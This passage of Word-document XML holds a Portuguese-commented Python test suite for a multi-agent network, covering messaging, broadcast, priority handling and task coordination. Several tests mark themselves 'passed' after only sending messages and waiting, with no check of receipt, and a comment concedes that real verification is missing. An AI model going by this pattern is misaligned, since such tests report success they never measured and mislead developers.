    </w:p>
    <w:p w14:paraId="309CB2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Suite completa de testes para validação da rede multi-agente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067624A9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6911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TESTES INCLUÍDOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D2CEC9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Testes de comunicação inter-agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C53C99D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Testes de coordenação e orquestração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A68A6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Testes de performance e escalabilidade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D6F42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Testes de tolerância a falhas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E237B5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Testes de segurança e validação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227FD0A1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Testes de auto-evolução com IA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C737AF8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Testes de integração com sistemas externos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154144B4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Benchmarks científicos rigorosos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F561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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A055AC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0392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asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D21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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118BAA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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619CC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uuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D9FE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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441284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unittest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157BA3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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43329E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datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F75C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typing import Dict, Any, List, Optional, Tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A78F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dataclasses import dataclass, asdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324962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statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44451B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numpy as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3302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pytest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB0E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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A09A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concurrent.futures import ThreadPoolExecutor, as_completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945FC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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFEEA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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6608DC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276E97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Importar componentes do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B1DA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multi_agent_network import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2682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MultiAgentNetwork, BaseNetworkAgent, AgentType, MessageType, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725C67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Priority, NetworkMetrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF545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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25792C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specialized_agents import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC15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OptimizationAgent, SecurityAgent, LearningAgent, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD8B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DataAgent, MonitoringAgent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA51A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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0432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ai_powered_agents import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B18FF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SelfEvolvingAgent, AIOptimizationAgent, AICache, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB68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AISecurityValidator, ScientificLogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF478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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B345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multi_agent_coordinator import MultiAgentCoordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18884D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network_orchestrator import NetworkOrchestrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FF313" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BCE6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logger = logging.getLogger(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF44027" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4E1680" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C1E9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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A3A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TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523EC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"""Resultado de um teste"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2805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test_id: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70656F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test_name: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E615B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test_category: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF1B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status: str  # "passed", "failed", "error"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D1E8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duration_ms: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE02A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details: Dict[str, Any]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB48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error_message: Optional[str] = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B35F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timestamp: datetime = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467676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9AC13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__post_init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696355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self.timestamp is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E62E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self.timestamp = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7393377F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C4F028" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3E13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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D63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BenchmarkResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70505A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"""Resultado de benchmark"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F65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benchmark_id: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0030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benchmark_name: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2543DE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metrics: Dict[str, float]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5CD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baseline_metrics: Dict[str, float]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D37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improvement_percentage: Dict[str, float]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488A8E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statistical_significance: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B32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confidence_level: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250EE8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sample_size: int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F42E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timestamp: datetime = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBAA0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B9944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__post_init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBDE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self.timestamp is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE2F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self.timestamp = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E950E05" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07479788" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608CFB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NetworkCommunicationTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B934E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"""Tester para comunicação inter-agentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A08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1C386A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__init__(self, network: MultiAgentNetwork):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B48CB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self.network = network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCDD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self.test_results: List[TestResult] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529556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63142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test_basic_communication(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACF5F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"""Testa comunicação básica entre agentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D87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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266676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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC62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E940E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7107AB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Criar agentes de teste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42AB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sender = OptimizationAgent("test_sender", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8EA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receiver = DataAgent("test_receiver", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471BE8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4AB4C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self.network.add_agent(sender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE40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self.network.add_agent(receiver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E285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234D5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Aguardar inicialização</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF183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asyncio.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F535F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C780B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Enviar mensagem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7465F2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test_message = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06271A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"type": "test_communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2533EE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"data": {"test_value": 42, "timestamp": datetime.now().isoformat()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545137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AC0BC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EF96F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sender.send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22485A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receiver.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD313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MessageType.REQUEST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A1C9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test_message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B5BC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44005B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CC3C3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Aguardar resposta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CAD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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BBE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4DF68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Verificar se mensagem foi recebida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C5C0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(Em implementação real, verificar logs ou estado do receiver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626737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CBDA1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01ED77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E095C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184047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74FD12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test_name="Basic Communication Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF2A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test_category="communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE51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status="passed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235ACD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6D968C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43872F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"sender_id": sender.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34381E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"receiver_id": receiver.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680430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"message_sent": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C60E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"response_time_ms": duration_ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60382F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667CAC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57EF44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1318A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 de comunica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 b</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sica passou em {duration_ms:.2f}ms")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349793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6022F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0CD99C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136820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1CBE32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47AD11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test_name="Basic Communication Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559334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test_category="communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5713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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2694F2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3B22CF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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4173A3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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C48ED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64C308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923EC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Teste de comunica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 b</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sica falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6225ED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41CCB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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBFDD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9711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48CF8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test_broadcast_communication(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2FC9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"""Testa comunicação broadcast"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A8E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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F46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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D229A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39289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67A90F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Criar múltiplos agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB74B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sender = SecurityAgent("test_broadcaster", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D34D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receivers = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4244DD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DataAgent(f"test_receiver_{i}", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0EC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i in range(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AC10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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF87F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A5194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self.network.add_agent(sender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BBAD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receiver in receivers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F053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self.network.add_agent(receiver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B38A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0C461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asyncio.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EE94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3D02B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Enviar broadcast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423DC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broadcast_message = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED596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"type": "security_alert",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC0C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"alert_level": "high",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6E42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"message": "Test broadcast message"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED6C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973AD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5D95D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sender.broadcast_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED641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MessageType.NOTIFICATION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C962A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broadcast_message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F600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Priority.HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13912B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43483A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5091E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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F1E7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05612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2114EF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B43FC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3A360D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46ADCF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test_name="Broadcast Communication Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15008D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test_category="communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513969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status="passed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228242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7A3CD3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F9F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"sender_id": sender.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F088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"receiver_count": len(receivers),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A04B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"broadcast_sent": True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B41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3966C5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36C431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FAACC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 de broadcast passou em {duration_ms:.2f}ms")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7661A6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B329A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7F5800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6E107E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09C2E6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15246A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test_name="Broadcast Communication Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B59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test_category="communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0144D0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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F8D7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30769A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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512374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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C03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2B8EAD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BB222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Teste de broadcast falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD224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7D77D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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF31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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A2C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9BE5D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test_message_priority_handling(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724EA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"""Testa tratamento de prioridades de mensagem"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E56EF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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18247A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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8353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B3003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6C0AD0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sender = OptimizationAgent("test_priority_sender", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD16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receiver = LearningAgent("test_priority_receiver", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096135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14102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self.network.add_agent(sender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6601CB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self.network.add_agent(receiver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD635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DC733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asyncio.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18F4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E6A16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Enviar mensagens com diferentes prioridades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE05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priorities = [Priority.LOW, Priority.NORMAL, Priority.HIGH, Priority.CRITICAL]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A6C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89E6A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i, priority in enumerate(priorities):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F9D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sender.send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F31C4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receiver.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E3E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MessageType.REQUEST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF30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{"test_id": i, "priority": priority.value},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE90A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priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29474F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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC34C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257F5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asyncio.sleep(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33850F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2BFE9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677B67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44622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11A69E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402CEC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test_name="Message Priority Handling Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F9F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test_category="communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F93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status="passed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6432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1DE852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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF8F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"priorities_tested": len(priorities),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F88E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"messages_sent": len(priorities)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217937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42590D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6D6FC5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3EF02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 de prioridades passou em {duration_ms:.2f}ms")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346FD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5675B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291B09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0D45B9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46EB07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417D08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test_name="Message Priority Handling Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A8DC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test_category="communication",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2918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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C97F8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6D2555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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4C7F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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC770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573CD4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3C199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Teste de prioridades falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452066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705E5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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0846DA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2149B1F5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233CC126" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCA8A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CoordinationTester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136C7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"""Tester para coordenação e orquestração"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A53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EAADD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__init__(self, network: MultiAgentNetwork):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFEB0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self.network = network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C957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self.test_results: List[TestResult] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3201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86942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test_task_coordination(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59297D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"""Testa coordenação de tarefas"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB80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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4DCE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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDAC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CC59C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141627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Criar coordenador e agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310670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coordinator = MultiAgentCoordinator(self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F115B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agents = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E795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OptimizationAgent("coord_test_opt", self.network.message_bus),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52A5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DataAgent("coord_test_data", self.network.message_bus),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAEB9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SecurityAgent("coord_test_sec", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1341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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D335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FA5EA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self.network.add_agent(coordinator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AF5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agent in agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144FB5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self.network.add_agent(agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51033B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4053D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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582761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9E6C2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Enviar tarefa complexa para coordenação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D122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complex_task = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0616A3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"id": str(uuid.uuid4()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9AA7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"type": "complex_analysis",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212985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"description": "Multi-step analysis task",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510359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"requirements": ["optimization", "data_processing", "security_check"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FB2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"priority": 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26007A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B686E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0556B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coordinator.send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FBE9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coordinator.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36386C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MessageType.TASK_ASSIGNMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DACDD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{"task_data": complex_task}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC585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4391B2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77820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asyncio.sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6680BA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39210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45962F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DAF41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376E0D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1404E6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test_name="Task Coordination Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0160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test_category="coordination",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD59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status="passed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2AB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669910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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191DC5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"coordinator_id": coordinator.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F26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"agents_count": len(agents),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142519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"task_assigned": True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5327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0720E5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1401D5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56CA0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 de coordena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 passou em {duration_ms:.2f}ms")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534BDA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FFB6C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0B8B59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7C05F9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0C5098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0AF2F1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test_name="Task Coordination Test",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534CA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test_category="coordination",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D10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status="error",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C0AD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74D82B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details={},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24089B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error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795273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6B38A7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77128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Teste de coordena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 falhou: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2DC2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57861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self.test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665198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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352DF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D46BC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test_load_balancing(self) -&gt; TestResult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCA6B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"""Testa balanceamento de carga"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E99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test_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA4E5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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F7CE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BBEB8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4EBEA1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Criar múltiplos agentes do mesmo tipo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02356D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agents = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1ED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DataAgent(f"load_test_agent_{i}", self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E456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i in range(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE03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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32E7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7F8D0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agent in agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F514B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self.network.add_agent(agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0E8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58714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asyncio.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C87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397DA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Simular múltiplas tarefas</w:t>
      </w:r>
    </w:p>
